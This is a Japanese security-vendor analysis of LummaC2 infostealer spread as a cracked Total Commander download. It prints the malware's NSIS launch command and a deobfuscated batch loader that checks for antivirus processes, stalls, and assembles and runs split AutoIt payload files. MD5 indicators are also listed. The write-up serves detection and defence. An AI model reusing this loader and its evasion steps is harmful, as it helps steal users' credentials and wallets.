Ahnlab SEcurity intellegence Center(ASEC)は、Total Commander というツールに偽装して配布される LummaC2 マルウェアを発見した。TotalCommander は Windows 用のファイルマネージャー(File Manager)であり、様々なファイルフォーマットに対応し、コピー(Copy)および移動(Move)機能や、ファイル内の文字列を活用した高度な検索機能、フォルダーの同期、FTP/SFTP 機能など、全般的なファイル管理を便利にするツールである。このツールは1か月間の無料使用期間のあと、正式バージョン(有料)ライセンスを購入する必要がある。
[図1] Total Commander
Google で「Total Commander Crack」と検索すると、クラックバージョンのダウンロードに関する記事が表示される。その投稿をクリックすると、Google Colab ドライブに接続し、ダウンロードボタンをクリックするように誘導している。その後[図2]から[図5]の流れのように複数回のページ移動を経て、最終的に攻撃者がファイルをアップロードした場所に移動する。これらのページの移動は自動でリダイレクトするものではなく、ユーザーが Crack に偽装したマルウェアをダウンロードするために投稿を読み、自らリンクをクリックする必要があった。すなわち、実際にこの Crack 版のソフトウェアをダウンロードしようとする人々を標的に攻撃が行われたことを意味する。特に、海外の有名コミュニティ(Reddit)で Total Commander のクラックバージョンのリクエストに関する投稿、そしてそれに対する回答でコメントにハイパーリンクを添付するなどの緻密さがうかがえる。
[図2] Google で「Total Commander Crack」と検索
[図3] ダウンロードページ1 – Google Colab ドライブ
[図4] ダウンロードページ2 – Reddit で偽装された投稿内容
[図5] ダウンロードページ3 – 最終的なダウンロードページ
当該リンクからダウンロードした ZIP ファイルは、内部に再び RAR ファイルが存在する二重圧縮構造となっており、パスワードがかかっている。
[図6] ダウンロードした圧縮ファイルとその中身
最終的に「installer_1.05_38.2.exe」ファイルの実行によるインストールを誘導し、当該ファイルを実行すると LummaC2 マルウェアに感染する。このマルウェアは LummaC2 マルウェアを NSIS スクリプトと AutoIt スクリプトで何度もラッピングした形式になっている。実行すると、最初に動作するのは NSIS スクリプトである。NSIS スクリプトの ExecShell コマンドを利用して、cmd で Batch スクリプトを実行している。以下の[図7]でハイライトした部分は、変数を文字列中間に挿入する方式をとっており、実行時点で変数に存在する値を代入すると、以下のようなコマンドが実行される。
| ExecShell open cmd “/c copy Nv Nv.cmd & Nv.cmd |
[図7] NSIS スクリプト
Batch スクリプトは、以下のように難読化されている。文字を変数に保存し、その変数をコマンドの中間に挿入するという方式で構成されており、コマンドの間に無意味な文字列が追加されているため、解析を困難にしている。
[図8] Nv.cmd (Batch スクリプト)
難読化を解除したスクリプトは以下の通りであり、比較的短いことがわかる。
| Set VOqMytMZEmITmzXaSwyTLVZwsCxvDeT=Olympic.comSet RRddJNCtGgRY=
Set FThiSRhhaXuEMFetxlGlyEUpdIbYBdqZFoz=5 tasklist | findstr /I “opssvc wrsa” & if not errorlevel 1 ping -n 194 127.0.0.1 Set /a Fires=363926 tasklist | findstr “AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth” & if not errorlevel 1 Set VOqMytMZEmITmzXaSwyTLVZwsCxvDeT=AutoIt3.exe & Set RRddJNCtGgRY=.a3x & Set FThiSRhhaXuEMFetxlGlyEUpdIbYBdqZFoz=300 cmd /c md Fires extrac32 /Y /E Schools <nul set /p =”MZ” > Fires\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT findstr /V “LIL” Cir >> Fires\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT cmd /c copy /b Fires\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT + Religion + Consisting + Stuart + Police + Turns + Constitutes + Knives + Momentum + Stuff + Keywords + Infections Fires\VOqMytMZEmITmzXaSwyTLVZwsCxvDeT cd Fires cmd /c copy /b ..\Hebrew + ..\Fla + ..\Mtv + ..\Novel + ..\Suffer + ..\Update + ..\Msn NRRddJNCtGgRY start VOqMytMZEmITmzXaSwyTLVZwsCxvDeT NRRddJNCtGgRY cd .. choice /d y /t FThiSRhhaXuEMFetxlGlyEUpdIbYBdqZFoz |
解析の結果、正常な AutoIt 実行ファイル(Runner)とコンパイルされた Autoit(.a3x)スクリプトが実行される。NSIS により最初に実行される cmd ファイルのみ単体のファイルであり、その後の .a3x スクリプトと当該スクリプトを実行させる Runner である AutoIt 実行ファイルは、複数個のファイルに分かれている。各ファイルがどのように分かれているかは、以下の[図9]を参考にしてほしい。
[図9] 分けられているバイナリファイル
最終的に実行される LummaC2 マルウェアは、以下の[図10]のように .a3x ファイル内で暗号化されており、実行時に復号化してメモリにロードされる。暗号化されたマルウェアのバイナリと、それを解凍およびロードする ShellCode の両方が、AutoIt スクリプト内部に含まれる形をしている。このようにマルウェアを AutoIt スクリプトでラッピングして配布する方法は、最近の攻撃者がよく使用する方法であり、この手法に関する詳細な解析情報については、以前の記事[1][2](韓国語にて提供)で確認できる。
[図10] .a3x ファイルを逆コンパイルしたスクリプト
LummaC2 マルウェアは情報窃取型のマルウェアであり、2023年初頭から本格的に拡散し始め、主にクラック、シリアルなどの違法プログラムに偽装して配布される。LummaC2 マルウェアに感染した場合、ブラウザに保存されたアカウント情報、メール情報、暗号通貨ウォレット情報、自動ログインプログラム情報などの機密情報が攻撃者の C&C サーバーに転送され、窃取した情報はダークウェブ上で取引されたり、さらなる攻撃に活用されるなど、2次被害が発生することがある。個人 PC から窃取された情報により、企業のシステムまで攻撃を受ける事例も絶えず発生している。LummaC2 マルウェアに関する解析情報は、過去の記事[3][4][5][6][7]を通じて確認できる。
このように、ソフトウェアをダウンロードするときは公式の配布サイトでダウンロードすることが望ましく、出どころが不明なソフトウェアを利用する際はとりわけ注意が必要である。
IOC 関連情報
MD5
0a2d4bbb5237add913a2c6cf24c08688
0da35eeccb9746a77d6b20dfdd01e1e1
12087e91e60f195b2bc69b819978690e
1f13356efe44af196602fc3438889d16
25728e657a3386c5bed9ae133613d660
追加 IoC は ATIP で提供しています。
URL
関連 IOC および詳細な解析情報は、AhnLab の次世代脅威インテリジェンスプラットフォーム 「AhnLab TIP」 サブスクリプションサービスを通して確認できる。
Categories: マルウェア